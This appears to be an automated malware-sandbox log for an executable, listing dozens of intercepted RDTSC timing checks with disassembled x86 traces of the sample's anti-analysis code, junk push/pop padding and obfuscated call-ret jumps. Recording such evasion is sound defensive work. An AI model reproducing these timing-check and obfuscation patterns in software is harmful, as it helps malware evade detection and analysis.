Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA988 second address: 16DA9D7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3E51171E7Eh 0x00000008 jmp 00007F3E51171E78h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 add dx, C081h 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F3E51171E68h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 nop 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA9D7 second address: 16DA9DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DA9DB second address: 16DA9FF instructions: 0x00000000 rdtsc 0x00000002 je 00007F3E51171E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3E51171E76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DB0BC second address: 16DB0E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jl 00007F3E511046A8h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DB231 second address: 16DB235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DB235 second address: 16DB23F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3E511046A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17168B7 second address: 17168D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3E51171E75h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17168D1 second address: 17168D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1716A20 second address: 1716A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1716A26 second address: 1716A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3E511046A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1716A32 second address: 1716A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3E51171E6Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171B006 second address: 171B00A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171B00A second address: 171B02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3E51171E76h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171B171 second address: 171B175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171B89F second address: 171B8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171B9FC second address: 171BA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171BA02 second address: 171BA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171BA09 second address: 171BA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171BA0F second address: 171BA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171BA15 second address: 171BA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 171BB8A second address: 171BB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1721D22 second address: 1721D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 jl 00007F3E511046A6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 jmp 00007F3E511046ACh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1721D43 second address: 1721D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1721D49 second address: 1721D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17209E6 second address: 1720A12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3E51171E6Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1720A12 second address: 1720A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1720D03 second address: 1720D2F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3E51171E71h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3E51171E71h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1720D2F second address: 1720D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1721003 second address: 1721008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1721008 second address: 172100F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17206E9 second address: 17206EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17206EE second address: 17206FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17215BD second address: 17215C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 172171D second address: 1721726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1721726 second address: 1721741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E51171E77h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1723B4A second address: 1723B5B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3E511046A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1723B5B second address: 1723B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1726722 second address: 1726728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1726876 second address: 172687A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 172687A second address: 172688A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F3E511046B0h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 172DDBC second address: 172DDC2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 172DDC2 second address: 172DDD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ADh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 172DDD4 second address: 172DDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jng 00007F3E51171E66h 0x00000014 pop ecx 0x00000015 jp 00007F3E51171E6Ch 0x0000001b jnp 00007F3E51171E66h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 172C848 second address: 172C87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B6h 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F3E511046B6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DAB8D second address: 16DAC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+12A038ACh] 0x0000000d mov ebx, dword ptr [ebp+12B9DC92h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F3E51171E68h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d add eax, ebx 0x0000002f mov di, 00EDh 0x00000033 mov edi, dword ptr [ebp+12A01AE2h] 0x00000039 push eax 0x0000003a push esi 0x0000003b pushad 0x0000003c jl 00007F3E51171E66h 0x00000042 push ebx 0x00000043 pop ebx 0x00000044 popad 0x00000045 pop esi 0x00000046 mov dword ptr [esp], eax 0x00000049 sbb dl, 00000023h 0x0000004c push 00000004h 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F3E51171E68h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000015h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 stc 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F3E51171E71h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16DAC11 second address: 16DAC3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jns 00007F3E511046A6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3E511046B6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 172D0DC second address: 172D0F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 ja 00007F3E51171E66h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 172D0F2 second address: 172D100 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173249B second address: 17324AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E51171E6Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173262F second address: 173263B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3E511046A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173263B second address: 1732641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1732641 second address: 1732645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1732645 second address: 1732686 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3E51171E66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F3E51171E79h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F3E51171E76h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17329B4 second address: 17329B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17329B8 second address: 17329C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17329C3 second address: 17329C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173DBAC second address: 173DBB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173DBB4 second address: 173DBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173BCF6 second address: 173BD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E51171E6Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173BD09 second address: 173BD26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173C198 second address: 173C1A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edx 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D9E60 second address: 16D9E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jns 00007F3E511046B4h 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F3E511046A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16D9E74 second address: 16C2D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F3E51171E68h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 call 00007F3E51171E74h 0x00000026 jmp 00007F3E51171E71h 0x0000002b pop edx 0x0000002c sub cx, DE12h 0x00000031 lea eax, dword ptr [ebp+12B9DC53h] 0x00000037 mov dword ptr [ebp+12A0211Eh], edi 0x0000003d push eax 0x0000003e push eax 0x0000003f jmp 00007F3E51171E6Fh 0x00000044 pop eax 0x00000045 mov dword ptr [esp], eax 0x00000048 mov ecx, dword ptr [ebp+12A035FCh] 0x0000004e call dword ptr [ebp+12A0289Eh] 0x00000054 jl 00007F3E51171E94h 0x0000005a pushad 0x0000005b jno 00007F3E51171E66h 0x00000061 push ebx 0x00000062 pop ebx 0x00000063 jns 00007F3E51171E66h 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d popad 0x0000006e push ebx 0x0000006f pop ebx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173C712 second address: 173C717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173C717 second address: 173C71D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173C71D second address: 173C721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173CA45 second address: 173CA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173CA49 second address: 173CA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F3E511046A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 173D321 second address: 173D347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E51171E79h 0x00000009 popad 0x0000000a je 00007F3E51171E6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17408CC second address: 17408F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3E511046B9h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F3E511046A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17408F4 second address: 17408FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17408FA second address: 174091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3E511046B6h 0x0000000d jnp 00007F3E511046A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174091E second address: 174094F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F3E51171E68h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F3E51171E80h 0x00000015 jmp 00007F3E51171E6Ah 0x0000001a jmp 00007F3E51171E70h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1740BCD second address: 1740BD6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1740D1B second address: 1740D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1740D23 second address: 1740D29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1740D29 second address: 1740D41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3E51171E6Ch 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1740EC7 second address: 1740EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3E511046ABh 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F3E511046A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1740EE1 second address: 1740EED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1740EED second address: 1740F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17411DD second address: 17411E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17411E1 second address: 17411E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17414C5 second address: 17414E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E76h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174D290 second address: 174D294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174D950 second address: 174D983 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3E51171E66h 0x00000008 jmp 00007F3E51171E79h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F3E51171E6Ch 0x00000015 push edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DC1E second address: 174DC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DC24 second address: 174DC37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3E51171E6Dh 0x0000000b rdtsc
